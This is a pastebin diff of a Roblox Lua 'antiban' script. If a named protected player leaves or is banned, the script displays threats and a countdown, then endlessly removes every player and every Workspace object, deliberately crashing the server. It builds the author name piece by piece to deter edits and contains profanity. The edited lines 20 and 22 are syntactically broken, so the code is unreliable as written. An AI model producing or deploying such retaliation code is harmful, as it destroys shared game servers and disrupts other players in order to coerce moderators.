SHOW:
|
|
- or go back to the newest paste.
1 | ------Bansey's antiban script!--------------------------------------Dont take credits!------------------------------------ | |
2 | ------------Don't change this!----------- | |
3 | n = "B" | |
4 | n = n.."a" | |
5 | n = n.."ns" | |
6 | n = n.."e" | |
7 | n = n.."y" | |
8 | h = Instance.new("Hint") | |
9 | m = Instance.new("Message") | |
10 | script.Name = n.."'s antiban" | |
11 | --------------You can change below------------------ | |
12 | respawntime = 1 | |
13 | protect = "memberhero" | |
14 | -------Version [Don't change]------------ | |
15 | version = 1.05 | |
16 | ||
17 | while true do | |
18 | if game.Players:findFirstChild(protect) == nil then | |
19 | m.Parent = game.Workspace | |
20 | - | m.Text = protect.." is banned, the server will be removed..." |
20 | + | m.Text = memberhero" is banned, the server will be removed..." |
21 | wait(1) | |
22 | - | m.Text = "Unban "..protect.." or remove your script, else the server will be down with the following countdown!" |
22 | + | m.Text = "Unban "or un kick " or remove your script, else the server will be down with the following countdown!" |
23 | wait(.5) | |
24 | for i= respawntime, 0, -1 do | |
25 | if game.Players:findFirstChild(protect) == nil then | |
26 | m.Text = "Fucking script kiddies banned firemomo45, server down." | |
27 | wait(.5) | |
28 | end | |
29 | end | |
30 | if game.Players:findFirstChild(protect) ~= nil then | |
31 | m.Text = protect.." came back, nothing will happen!" | |
32 | wait(3) | |
33 | m:remove() | |
34 | else | |
35 | while true do | |
36 | for i, p in ipairs(game.Players:getChildren()) do | |
37 | p:Remove() | |
38 | end | |
39 | for i, w in ipairs(game.Workspace:getChildren()) do | |
40 | w:Remove() | |
41 | end | |
42 | wait() | |
43 | end | |
44 | end | |
45 | else | |
46 | h.Parent = game.Workspace | |
47 | - | h.Text = "Don't ban firemomo45 PLS" |
47 | + | h.Text = "Don't ban memberhero PLS" |
48 | end | |
49 | wait() | |
50 | end |